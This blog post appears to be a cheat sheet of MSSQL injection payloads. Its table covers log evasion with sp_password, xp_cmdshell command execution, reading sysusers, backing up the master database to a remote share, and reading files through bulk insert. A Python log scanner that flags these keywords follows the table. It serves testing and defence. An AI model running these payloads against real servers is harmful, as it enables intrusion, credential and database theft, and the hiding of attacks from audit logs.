MSSQL Injection Commands and Output

| Payload | Description (if any) |
| --- | --- |
| `'admin --sp_password` | `sp_traceXXX` audit evasion. `sp_password` prevents storing clear text passwords in the log files. Appending it after your comment marker (`--`) can prevent SQL injection queries from being logged. |
| `select @@version` | View database version. |
| `select @@servername` | Misc. information disclosure. |
| `select @@microsoftversion` | Misc. information disclosure. |
| `select * from master..sysservers` | Misc. information disclosure. |
| `select * from sysusers` | View database usernames and passwords. |
| `exec master..xp_cmdshell 'ipconfig+/all'` | Misc. command execution with `xp_cmdshell`. |
| `exec master..xp_cmdshell 'net+view'` | Misc. command execution with `xp_cmdshell`. |
| `exec master..xp_cmdshell 'net+users'` | Misc. command execution with `xp_cmdshell`. |
| `exec master..xp_cmdshell 'ping+system-controlled-by-attacker'` | Misc. command execution with `xp_cmdshell`; this is useful for blind SQL injection tests (where no results are displayed). |
| `BACKUP database master to disk='\\{IP}\{sharename}\backupdb.dat'` | Backup entire database to a file. This attack can be used to steal a database. |
| `create table myfile (line varchar(8000))" bulk insert myfile from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"--` | Reading files on the filesystem. |
| `xp_servicecontrol (START or STOP)` | Start and stop Windows services. |
| `str1 + str2` or `n+n` | Concatenate strings for blind SQL injection tests. |
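
From the defender's side, most rows in the table leave recognizable strings in web server request logs, which are written independently of SQL Server's own trace and so are unaffected by `sp_password`. The following Python sketch is an added example, not part of the original post: it URL-decodes request lines (the payloads above use `+` for spaces) and flags the keywords from the table. The rule names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; the keywords come from the payload table.
RULES = {
    "audit_evasion_sp_password": re.compile(r"--.*sp_password", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "xp_servicecontrol": re.compile(r"\bxp_servicecontrol\b", re.I),
    "recon_globals": re.compile(r"@@(version|servername|microsoftversion)\b", re.I),
    "system_tables": re.compile(r"\b(master\.\.sysservers|sysusers)\b", re.I),
    "backup_to_unc": re.compile(r"\bbackup\s+database\b.*\bto\s+disks?\s*=\s*'\\\\", re.I),
    "bulk_insert_file": re.compile(r"\bbulk\s+insert\b.*\bfrom\s+'", re.I),
}

# Constructed sample request lines (not real traffic).
SAMPLE_LOG = [
    "GET /item.asp?id=1;exec+master..xp_cmdshell+'net+view'-- 200",
    "GET /login.asp?user='admin+--sp_password 500",
    "GET /item.asp?id=1%2520union%2520select%2520@@version-- 200",
    "GET /item.asp?id=42 200",
]


def normalize(raw, max_rounds=3):
    """Undo (possibly repeated) URL encoding, typographic quotes and odd spacing."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)  # also turns '+' into a space
        if decoded == text:
            break
        text = decoded
    # Map curly quotes to straight ones so copy-pasted payloads still match.
    text = text.translate(str.maketrans("‘’“”", "''\"\""))
    return re.sub(r"\s+", " ", text)


def scan(line):
    """Return the sorted names of all rules that match one log line."""
    text = normalize(line)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan(entry), entry)
```

Keyword matching like this is a triage aid for log review; it does not replace parameterized queries or disabling `xp_cmdshell` on the server.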

About noneil
Rapper turned Rockstar!